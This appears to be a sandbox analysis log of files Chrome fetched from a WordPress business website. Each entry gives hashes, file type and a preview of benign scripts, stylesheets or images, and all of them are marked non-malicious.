                                                                                                                      SHA-512:EEE6A1C268A519F4F281B2D76B5193BB068E94D1410372EF062587888589E139B20BB635E2331E97C857D7D835E9372F50822C5DAED29B139AB91FF5633C7A7F
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*! This file is auto-generated */.window.addComment=function(v){var I,C,h,E=v.document,b={commentReplyClass:"comment-reply-link",commentReplyTitleId:"reply-title",cancelReplyId:"cancel-comment-reply-link",commentFormId:"commentform",temporaryFormId:"wp-temp-form-div",parentIdFieldId:"comment_parent",postIdFieldId:"comment_post_ID"},e=v.MutationObserver||v.WebKitMutationObserver||v.MozMutationObserver,r="querySelector"in E&&"addEventListener"in v,n=!!E.documentElement.dataset;function t(){d(),e&&new e(o).observe(E.body,{childList:!0,subtree:!0})}function d(e){if(r&&(I=g(b.cancelReplyId),C=g(b.commentFormId),I)){I.addEventListener("touchstart",l),I.addEventListener("click",l);function t(e){if((e.metaKey||e.ctrlKey)&&13===e.keyCode)return C.removeEventListener("keydown",t),e.preventDefault(),C.submit.click(),!1}C&&C.addEventListener("keydown",t);for(var n,d=function(e){var t=b.commentReplyClass;e&&e.childNodes||(e=E);e=E.getElementsByClassName?e.getElementsByClassName(t):e.querySelectorA
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (5692), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5692
                                                                                                                      Entropy (8bit):5.030640807030057
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:PQlNKX1zRos8L1M8EZI8Y2VWSfxUeNBhQ4lMq3Yd2HD:PFusSOu8YxuDh1L
                                                                                                                      MD5:BECA72584B7B6DF68F09CD56ACD813CC
                                                                                                                      SHA1:C3788C2E7BCFBDB9067FB5579E9CF323609A2187
                                                                                                                      SHA-256:E40C49D2D7CFC035902C7B8471E9736B9A05B2ADC59ED919567063676D3B793E
                                                                                                                      SHA-512:1667BB61B00AF922A31E247B96CA2641FABA9500020BF27F957CAF91F87F582D832B6DC3B4C885E5031416C871B8F803CD13D670614AE5A76B351786BAB71B6A
                                                                                                                      Malicious:false
                                                                                                                      Preview:!function(e){"use strict";e(window).on("resize",function(){e(".sf-menu ul.tracked-pos").removeClass("tracked-pos")});var t,s,n,a,r,o,i,h,l,d,p,u,f,c,m,v,g=(s="sf-breadcrumb",n="sf-js-enabled",a="sf-with-ul",r="sf-arrows",o=function(){var t=/iPhone|iPad|iPod/i.test(navigator.userAgent);return t&&e("html").css("cursor","pointer").on("click",e.noop),t}(),i="behavior"in(t=document.documentElement.style)&&"fill"in t&&/iemobile/i.test(navigator.userAgent),h=function(e,t){var s=n;t.cssArrows&&(s+=" "+r),e.toggleClass(s)},l=function(e){e.children("a").toggleClass(a)},d=function(e){var t=e.css("ms-touch-action");t="pan-y"===t?"auto":"pan-y",e.css("ms-touch-action",t)},p=function(t){var s=e(this),n=s.siblings(t.data.popUpSelector);n.length>0&&n.is(":hidden")&&(s.one("click.superfish",!1),"MSPointerDown"===t.type?s.trigger("focus"):e.proxy(u,s.parent("li"))())},u=function(){var t=e(this),s=v(t);e(this).parents(".megamenu").length>0||(clearTimeout(s.sfTimer),t.siblings().superfish("hide").end().su
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (10643)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):274617
                                                                                                                      Entropy (8bit):5.408496759284294
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:Un6e7IhYBtqhKCNgYCsGsRtBXCiPy8HmHEuYyrs2/6M/6VZA1a:Un6e7IhYBtqhKJY1XCiPy8GHEuYyrs2c
                                                                                                                      MD5:53F03F3BF5AC50ECFE0EA1E1E2ED79E6
                                                                                                                      SHA1:BD57A795674792A15CF3E53B5565E39C1B66E1D5
                                                                                                                      SHA-256:0061A2D076D7E51D46D0F48ECB18F343E53FBB63FC93B7851073FE1FE5C78BFD
                                                                                                                      SHA-512:EB471BDB13E6E927550D97D5E10CAD69A8A863048B0E4A98CE3CA3C4AE20FB5D97BF3FB9420209AE112D7AB4602C2EE10AA3B61F6D187704384EBE30D38D78EC
                                                                                                                      Malicious:false
                                                                                                                      Preview:google.maps.__gjsload__('common', function(_){var Kia,Jia,Mia,Sia,Zia,$ia,cja,Cr,dja,Dr,eja,Er,fja,Fr,Ir,Kr,hja,ija,lja,mja,oja,us,qja,sja,tja,Fs,xja,jt,Fja,Hja,Gja,Lja,Mja,Pja,Qja,Rja,Ot,Ut,Wja,Vt,Yt,Xja,Zt,Yja,bu,dka,eka,ju,fka,gka,Xka,Yka,vla,zla,Ala,Bla,Cla,Dla,Lw,Hla,Mw,Ila,Jla,Lla,Nla,Mla,Pla,Ola,Kla,Qla,Sla,Ula,bma,fma,gma,pma,nma,gx,hx,rma,sma,tma,uma,wma,xma,Pw,Qw,Rla,Ow,jw,Pia,yma,Qia,Vla,Ria,Wia,Yia,Dma,Ema,Fma,Gma,Hma,ox,xv,Kma,Lma,Mma,uja,zs;.Kia=function(a){const b=[];let c=a.length;var d=a[c-1];let e;if(_.Pg(d)){c--;e={};var f=0;for(const g in d)d[g]!=null&&(e[g]=Jia(d[g],a,g),f++);f||(e=void 0)}for(d=0;d<c;d++)f=a[d],f!=null&&(b[d]=Jia(f,a,d+1));e&&b.push(e);return b};Jia=function(a,b,c){a instanceof _.dh&&(a=a.Jl(b,+c));return Array.isArray(a)?Kia(a):typeof a==="boolean"?a?1:0:typeof a==="number"?isNaN(a)||a===Infinity||a===-Infinity?String(a):a:a instanceof Uint8Array?_.gc(a):a instanceof _.ic?_.qc(a):a};_.Kq=function(a){return!!a.handled};._.Lia=function(a,b){functio
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):5679
                                                                                                                      Entropy (8bit):5.3852577514379325
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:czOLvdOL/GJc+ufOLZN2OgNXlOgNtFZKOgN7OgNS3yOgNKOgNMJc+umOgNNN2OCK:cWAu5ENX7NCNRNS3sNEN4NNiNU1NHNUI
                                                                                                                      MD5:B11E9D734BC3498DF99D28AA03C583F0
                                                                                                                      SHA1:C4AFD618153D5695ADD9931E2603C2F78D14CB2B
                                                                                                                      SHA-256:33F2650FC88AD247BF56A18F5674AB9C3363E0716F03F8D8723AAC8482B7DD10
                                                                                                                      SHA-512:49610664DC562A28BF8BED79171C251B0C23EF5CB549F6C6E527826F7D6A446BD1A4FCA02C1EE31A984948A177D5592E5CB10B9A9E1E8EA11CF51CA78D8C414D
                                                                                                                      Malicious:false
                                                                                                                      URL:https://fonts.googleapis.com/css?family=Roboto%3A500%2C700%7CQuestrial%3A400&subset=latin&ver=1669975115
                                                                                                                      Preview:/* vietnamese */.@font-face {. font-family: 'Questrial';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/questrial/v18/QdVUSTchPBm7nuUeVf70sSFlq20.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Questrial';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/questrial/v18/QdVUSTchPBm7nuUeVf70sCFlq20.woff2) format('woff2');. unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Questrial';. font-style: normal;. font-weight: 400;. src: url(https://fonts.gstatic.com/s/questrial/v18/QdVUSTchPBm7nuUeVf70viFl.woff2) format('woff2');. unic
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2242)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):81125
                                                                                                                      Entropy (8bit):5.4637011685666454
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:M/qDAZ+Y1cbSZQfYkzaStW9TS/3ZnOMOCp+Zl7VvL5DKacwkdX4Y5k9hOUOq78TS:CqDAZ71cbSZQfYkzaStOS/3ZnJL+n7Vt
                                                                                                                      MD5:D985D1C7012C22729C1719A7A22CDCFD
                                                                                                                      SHA1:70102F754687285C1D632F574A4AFD05D69088E7
                                                                                                                      SHA-256:9510056BB9678DC3E45FFAA1C0044F152426BB4484A7DA85891CB91D1F8523B0
                                                                                                                      SHA-512:7449777A470EC0524878BC95BA0EAE9800DE1EA47769DBB40C488C5DF707E0D024D7720EFC9B51CBEB6025A43019439AF1B38E2FF9352DE244B1E489951FF808
                                                                                                                      Malicious:false
                                                                                                                      URL:https://maps.googleapis.com/maps-api-v3/api/js/59/1/map.js
                                                                                                                      Preview:google.maps.__gjsload__('map', function(_){var Dta=function(a){try{return _.ra.JSON.parse(a)}catch(b){}a=String(a);if(/^\s*$/.test(a)?0:/^[\],:{}\s\u2028\u2029]*$/.test(a.replace(/\\["\\\/bfnrtu]/g,"@").replace(/(?:"[^"\\\n\r\u2028\u2029\x00-\x08\x0a-\x1f]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?)[\s\u2028\u2029]*(?=:|,|]|}|$)/g,"]").replace(/(?:^|:|,)(?:[\s\u2028\u2029]*\[)+/g,"")))try{return eval("("+a+")")}catch(b){}throw Error("Invalid JSON string: "+a);},Eta=function(){var a=_.Vq();return _.Bi(a.Gg,18)},Fta=function(){var a=._.Vq();return _.H(a.Gg,17)},Gta=function(a,b){return a.Eg?new _.wm(b.Eg,b.Fg):_.xm(a,_.cr(_.dr(a,b)))},Hta=function(a){if(!a.getDiv().hasAttribute("dir"))return!1;const b=a.getDiv().dir;return b==="rtl"?!0:b==="ltr"?!1:window.getComputedStyle(a.getDiv()).direction==="rtl"},Ita=function(a){return new Promise((b,c)=>{window.requestAnimationFrame(()=>{try{a?_.fn(a,!1)?b():c(Error("Error focusing element: The element is not focused after the focus attem
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):6709
                                                                                                                      Entropy (8bit):7.346517568966907
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:SU3sPLOt+cuFPoxXvX+Qd3RDKvPL6K7zzA33NrRUayh5i+hQJQ2kR:OO+cuJif+QhRDKH7ru3lRUBh1mJpw
                                                                                                                      MD5:35EB816FCA441A39D715F86E093F743C
                                                                                                                      SHA1:5A2D72D9E04788EA62FF3F9618F6E4CC763A441B
                                                                                                                      SHA-256:6BCEFA42AA2D7D56D4E67D86C18F065DBA38C19A453498794A87A90E408FFB36
                                                                                                                      SHA-512:F4BA2692C3F8BAFE7C271F6590E1F0D9C9ED054F59867C33A28BCCC60F85FB943A621562E76D113A52AF25443990914132473DBFDF7BABBD002BDB7FB7EDB953
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/DIMENSION.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d............................3............................................................................................................................................J.J......................................................................................P....4. 0@.25!".E.....................1..!.AQaq2...."Rr. 0@.B.#....b3....C.................P.. `..!....................!1Aa.Qq. P...0...@..................P..............................................................................................................................................................................................................................................................................................x9........$.......%.......Ly:..bI.)..#.(.B'.E... ..p..>`.Yt]........#.Z...1vW...J..3.b[.."..@=..p.k.Fw.WY.....?@...#.[.J..*....}!...Z.....tE=....j........n..x....."Y..N8...)bq,J.JhH..[.. ...6...%1./dY.t.d........x+...*.#.n.'"........f......qs
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (17638)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):17741
                                                                                                                      Entropy (8bit):5.294608590099363
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:f7LTpKyzqrGGpLZo12xhMFoFlm5dwi7SeigzrLL:XTppX12j2LD7SeH
                                                                                                                      MD5:572D66E85091711B6EE76609573A8364
                                                                                                                      SHA1:332031949D78A49E8A18611556253660574E47DB
                                                                                                                      SHA-256:5CBDA29EA5096AC9404C59C77493A2F467D0EB4A27F16C750B61FC0D888DD716
                                                                                                                      SHA-512:CF8394AB0DFCA8D2E99F59626C037D06CA03C7A9DB3458A8E6503A0AE4E9F4D94AF376FCF61832095ABE37915D049A6D20DCEDC67D59DD268A48A512E543FAD1
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/anime.min.js?ver=4.5.1
                                                                                                                      Preview:/*. * anime.js v3.2.1. * (c) 2020 Julian Garnier. * Released under the MIT license. * animejs.com. */..!function(n,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):n.anime=e()}(this,function(){"use strict";var n={update:null,begin:null,loopBegin:null,changeBegin:null,change:null,changeComplete:null,loopComplete:null,complete:null,loop:1,direction:"normal",autoplay:!0,timelineOffset:0},e={duration:1e3,delay:0,endDelay:0,easing:"easeOutElastic(1, .5)",round:0},t=["translateX","translateY","translateZ","rotate","rotateX","rotateY","rotateZ","scale","scaleX","scaleY","scaleZ","skew","skewX","skewY","perspective","matrix","matrix3d"],r={CSS:{},springs:{}};function a(n,e,t){return Math.min(Math.max(n,e),t)}function o(n,e){return n.indexOf(e)>-1}function u(n,e){return n.apply(null,e)}var i={arr:function(n){return Array.isArray(n)},obj:function(n){return o(Object.prototype.toString.call(n),"Object")},pth:function(n){retu
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):11982
                                                                                                                      Entropy (8bit):7.754960854955635
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:pfWhkJexWNtuSM6nJ3oMulSSfdHg+ktTi+t8a6fSbYC8KJ:hsYASMHfNgxdtrFEbKJ
                                                                                                                      MD5:130217D35A017B9B42940FEDC36A00C5
                                                                                                                      SHA1:2EA424EE8807FFEFA2C8E406F7CFC8C66DE53D58
                                                                                                                      SHA-256:356DDE53424D6542B912E6D53F7FA6E4C36686D5205BBB1CE671D3A616C31641
                                                                                                                      SHA-512:556B30E391753DF80A8BF46C556E989FD393CCC5AC4717CA895F7A3EFD47A7B323FE6C9D59098DC6ED7455505E6FDE916CA6A1850928BF38B314F0DEFF2B2F03
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................B......!x................................................................................................................................................J.J.....................................................................................1..... 4@!.5.0P.3"#.$%.......................!1AQq"r..a...2.0..BR3@.# P...b.CS4..................!0`...@p.....................1!A.Qaq.... 0.@P......................................................................................................................................................................................................................,.f..H.................;...)................n.h9....................\..4=.7H..$u{U`..>H..1.?^....z..........\ls..S.8..=...k.r.S.V.h,...+Y..].{.........*.........<...^"hc...E.4.Ih...l.og.....s..ry........j7*FK..R[.\.\...7...0..\.ku.O=..].;.....9..U...Y...+....y.[...s=..3.g.g..$}3/O..;...O.$#...~...:./>..u...|.'..u.~z..G.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):10011
                                                                                                                      Entropy (8bit):7.669616884558006
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:tRnSNIoaSsL4JpFLWuuN4SZQxd1xRMj+ljYvn4eHl8ey0:jWnNrjYuuN4wQnjq+1GxyeH
                                                                                                                      MD5:CD770E0ACFB0A72B3DCDC1EB23BD2892
                                                                                                                      SHA1:CEF8108389DCA37466B9C316F9B4A4B32E80CE0E
                                                                                                                      SHA-256:80C737A89AF2E1B63EA4F0B2CBC67BC8F05F37BECB28BFE3A2192833AB5A7C3E
                                                                                                                      SHA-512:F745023F096F15942F4DEE320FC46C8E65BC7DEB05170DF757DE1BF1A3D0085C99B5D14AFA4E590D97B5C6730250751716F3BEBBF0FDC281B874D12C5757CABA
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/city-of-cape-town.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................\..........'.............................................................................................................................................J.J.........................................................................................@P!...1..."2#3.`$......................!..1AQa".q2@..Bb#..P..3$..Rr`...C4......................P!. .1a...A....................!1AQaPq...@.....`....0 ...............P.....................................................................................................................................................................n^..|..i.....@.............m.|Q.c...soc...^.............*..W.....;,.]}........'a!..................i~xV.-...'...oe..O.P.^..W...................Vv.........r.z...3...=...<..sY................V.7.m.w.....y.!].....-....^...S...........#...;f...N...k|.sQ....;).O.3)6..............!.+[~yr..w{....bc.5..H........_M..G...........<.m...~.\."..8...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6564
                                                                                                                      Entropy (8bit):7.325978337127352
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:MCRkwlU8hP+l/OOAk0plpq+vivnhsLz03NVY3iosuFALkbG1pY9hLOx:BlUuGOOA5rq+o2P036XA4G49NOx
                                                                                                                      MD5:015746C89484A1F86707C1E9718998CB
                                                                                                                      SHA1:231FB5A7F692E7EC1E62F664AED8CB53986584E5
                                                                                                                      SHA-256:B704326AEE6F8387D25490FE9EB86DD8F7494FC424F4D03C0C880F0FC45C511D
                                                                                                                      SHA-512:9A34DB07FE08E64155E3357778CB5340792B83D10A28C9ADE01CA139706B88132E6BCAD554CA400CD8F209ED5384F9BA43A3F41BD7744639EA125B51BFAB4D6A
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.........................................................................................................................................................................J.J......................................................................................5.P...0...4@.!%........................!1.AQq"2..a....B.#s0...Rr.3.P@.b..$...Cc....................q....................!1.AQaq ....0P..@................................................................................................................................................................................................................................................................................................."..u.................7.x.<.3.q.I.*.`..&e~.J.y(.bm..'r.l...tg..Y.$U....7.|.....7..D.%..s........6...K.............S..........j].....+...X!2.Nad.c%.....N%....9..5u...^=.d.k^.B.g.%m}...t....YvF..1#.......c/...'...WY..:~}.._..w..j.s.....k.?.K..3/j.s.....".
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):13414
                                                                                                                      Entropy (8bit):7.786805842610184
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:E2YG+u64w4mNh4epujm6fMxUv4tWFczrEv3sLYxVA4xnwtZZbPSDvFStNmJBmHk2:EzD1NxpO8tWFcEsLONn4xaDvFQbHk2
                                                                                                                      MD5:6B6F17D55D30BB0D8FD7A18FBF53A8D5
                                                                                                                      SHA1:6B6D4CC967C30EE3567E92413D6901001B667DF7
                                                                                                                      SHA-256:3A2663787018F063FAB89548392A1F952A633F4EE0B8302AFAE5F54FC32B2D58
                                                                                                                      SHA-512:909442ADB556B4DE792F26C28CCC00151FCF8B27A9A0E76A680393A8C65D26597A62FD942566ECF803970FD35C23DC6A9FBD51039AFCE24B5294E0C8DBE57DE4
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/cape-union-mart.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.......................%...4d............................................................................................................................................J.J...........................................................................................0@!.. P1A"..2`p.B#.....................!.1.AQ"2..aq..B..Rbr.#0@....3.4 .CP..c`......Ss$......................! .@P0...q....................!1AQa.q..0@. ...P..p`.........................................................................................................................................................................................................................fi.5...............l.+....Wnk.c.0-......o.c.'............:9......d.&....c...ES>..}W=x/.y.@........EWQ)l..@......b.._zs........5Nd|'.2......Q.yE. .......:........q..Q.P.jDBu.....RM.....QS..#...fi...>.........1d.$V...*}.@..1"o.....[I.R..Y..=.rP.....9...%....M..X.d'.$.R...G...T.,.........]..r.S.j.W).#l
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3598), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3598
                                                                                                                      Entropy (8bit):4.6374658153318915
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:9lCTwFpgauXdNzUzNI4DyDmzHAW6RzK35yG:Sw7garNTimHH
                                                                                                                      MD5:CA1D5DC48253DFEB847A9569D70474EF
                                                                                                                      SHA1:694F359F5C0BBD1E4199EFAA709E179F11FD5C37
                                                                                                                      SHA-256:319F6AC36829B0A184068573ED03320B9BB52DAD872F5D1AE4714510B59F5F53
                                                                                                                      SHA-512:56A89D0A6F424011C6A7A31B02A64BDB49D1BCC70E239DCA6FB057AE57962D249A90FCC32A97CE413581EF4FAEFAB8CF2604A1F765E2EFE5EA9C434E679DAB23
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/salient/menu-dynamic.css?ver=26058
                                                                                                                      Preview:#header-outer .nectar-ext-menu-item .image-layer-outer,#header-outer .nectar-ext-menu-item .image-layer,#header-outer .nectar-ext-menu-item .color-overlay,#slide-out-widget-area .nectar-ext-menu-item .image-layer-outer,#slide-out-widget-area .nectar-ext-menu-item .color-overlay,#slide-out-widget-area .nectar-ext-menu-item .image-layer{position:absolute;top:0;left:0;width:100%;height:100%;overflow:hidden;}.nectar-ext-menu-item .inner-content{position:relative;z-index:10;width:100%;}.nectar-ext-menu-item .image-layer{background-size:cover;background-position:center;transition:opacity 0.25s ease 0.1s;}#header-outer nav .nectar-ext-menu-item .image-layer:not(.loaded){background-image:none!important;}#header-outer nav .nectar-ext-menu-item .image-layer{opacity:0;}#header-outer nav .nectar-ext-menu-item .image-layer.loaded{opacity:1;}.nectar-ext-menu-item span[class*="inherit-h"] + .menu-item-desc{margin-top:0.4rem;}#mobile-menu .nectar-ext-menu-item .title,#slide-out-widget-area .nectar-ext
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (2242)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):81125
                                                                                                                      Entropy (8bit):5.4637011685666454
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:M/qDAZ+Y1cbSZQfYkzaStW9TS/3ZnOMOCp+Zl7VvL5DKacwkdX4Y5k9hOUOq78TS:CqDAZ71cbSZQfYkzaStOS/3ZnJL+n7Vt
                                                                                                                      MD5:D985D1C7012C22729C1719A7A22CDCFD
                                                                                                                      SHA1:70102F754687285C1D632F574A4AFD05D69088E7
                                                                                                                      SHA-256:9510056BB9678DC3E45FFAA1C0044F152426BB4484A7DA85891CB91D1F8523B0
                                                                                                                      SHA-512:7449777A470EC0524878BC95BA0EAE9800DE1EA47769DBB40C488C5DF707E0D024D7720EFC9B51CBEB6025A43019439AF1B38E2FF9352DE244B1E489951FF808
                                                                                                                      Malicious:false
                                                                                                                      Preview:google.maps.__gjsload__('map', function(_){var Dta=function(a){try{return _.ra.JSON.parse(a)}catch(b){}a=String(a);if(/^\s*$/.test(a)?0:/^[\],:{}\s\u2028\u2029]*$/.test(a.replace(/\\["\\\/bfnrtu]/g,"@").replace(/(?:"[^"\\\n\r\u2028\u2029\x00-\x08\x0a-\x1f]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?)[\s\u2028\u2029]*(?=:|,|]|}|$)/g,"]").replace(/(?:^|:|,)(?:[\s\u2028\u2029]*\[)+/g,"")))try{return eval("("+a+")")}catch(b){}throw Error("Invalid JSON string: "+a);},Eta=function(){var a=_.Vq();return _.Bi(a.Gg,18)},Fta=function(){var a=._.Vq();return _.H(a.Gg,17)},Gta=function(a,b){return a.Eg?new _.wm(b.Eg,b.Fg):_.xm(a,_.cr(_.dr(a,b)))},Hta=function(a){if(!a.getDiv().hasAttribute("dir"))return!1;const b=a.getDiv().dir;return b==="rtl"?!0:b==="ltr"?!1:window.getComputedStyle(a.getDiv()).direction==="rtl"},Ita=function(a){return new Promise((b,c)=>{window.requestAnimationFrame(()=>{try{a?_.fn(a,!1)?b():c(Error("Error focusing element: The element is not focused after the focus attem
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (1880), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1880
                                                                                                                      Entropy (8bit):5.054751433371674
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:BgrtH6pSqr1h7gM10kKgMZKQhCrgp2OBqLlN:EH6pSq09qlN
                                                                                                                      MD5:ABE6B3B54FB492863DECB8525994CC02
                                                                                                                      SHA1:D99473157436C3D671CEB8BCF1C55DE9DDFEFCF6
                                                                                                                      SHA-256:A9C8CBCF0ED23E3EC2F71ACC45D2C4836A1DD995CCE5630964063C7A44B40283
                                                                                                                      SHA-512:C80B1399125339B5447297372B84AC6821339DC3395D008EF288C8ED13F58EB61094B9F211CD0B0228C4FD6CAEF4D107C2EF88E94319D65A87F9BE531BEDA713
                                                                                                                      Malicious:false
                                                                                                                      Preview:var headerEl=document.getElementById("header-outer"),headerSpaceEl=document.getElementById("header-space");void 0!==headerEl&&null!=headerEl&&void 0!==headerSpaceEl&&null!=headerSpaceEl&&headerSpaceEl.hasAttribute("data-secondary-header-display")&&(headerSpaceEl.style.height=headerEl.clientHeight+"px"),jQuery(function(e){"use strict";var t,a,r,n,o,d,i=!1;function h(){var a=t.offset().top;e("#page-header-wrap.fullscreen-header").css("height","auto"),t.css("height",parseInt(window.innerHeight)-parseInt(a)+"px")}if(navigator.userAgent.match(/(Android|iPod|iPhone|iPad|BlackBerry|IEMobile|Opera Mini)/)&&(i=!0),i&&e("#page-header-bg.fullscreen-header").length>0){t=e("#page-header-bg"),h();var l=window.innerWidth,s=window.innerHeight;e(window).resize(function(){e(window).width()!=l&&e(window).height!=s&&(h(),l=window.innerWidth,s=window.innerHeight)})}i&&e(".nectar_fullscreen_zoom_recent_projects").length>0&&(a=e(".body-border-top").length>0&&e(window).width()>1e3?e(".body-border-top").height
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):13414
                                                                                                                      Entropy (8bit):7.786805842610184
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:E2YG+u64w4mNh4epujm6fMxUv4tWFczrEv3sLYxVA4xnwtZZbPSDvFStNmJBmHk2:EzD1NxpO8tWFcEsLONn4xaDvFQbHk2
                                                                                                                      MD5:6B6F17D55D30BB0D8FD7A18FBF53A8D5
                                                                                                                      SHA1:6B6D4CC967C30EE3567E92413D6901001B667DF7
                                                                                                                      SHA-256:3A2663787018F063FAB89548392A1F952A633F4EE0B8302AFAE5F54FC32B2D58
                                                                                                                      SHA-512:909442ADB556B4DE792F26C28CCC00151FCF8B27A9A0E76A680393A8C65D26597A62FD942566ECF803970FD35C23DC6A9FBD51039AFCE24B5294E0C8DBE57DE4
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d.......................%...4d............................................................................................................................................J.J...........................................................................................0@!.. P1A"..2`p.B#.....................!.1.AQ"2..aq..B..Rbr.#0@....3.4 .CP..c`......Ss$......................! .@P0...q....................!1AQa.q..0@. ...P..p`.........................................................................................................................................................................................................................fi.5...............l.+....Wnk.c.0-......o.c.'............:9......d.&....c...ES>..}W=x/.y.@........EWQ)l..@......b.._zs........5Nd|'.2......Q.yE. .......:........q..Q.P.jDBu.....RM.....QS..#...fi...>.........1d.$V...*}.@..1"o.....[I.R..Y..=.rP.....9...%....M..X.d'.$.R...G...T.,.........]..r.S.j.W).#l
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):7053
                                                                                                                      Entropy (8bit):7.431758888454918
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:SROmSV84twEdCfWY9cNYjbdLE1nuQ+fB04i+6sB:Wfa84yEUOujb5E53+feO6sB
                                                                                                                      MD5:ACF13A47BC5977E9E6825A57400EAC65
                                                                                                                      SHA1:347F4A10BA167DB8EF214DB6D0E3CEAECBE557AB
                                                                                                                      SHA-256:16E62D1C1B9790D640F8B8ED021865B9D38437FAB0A0E94FFEAE00DDC159F557
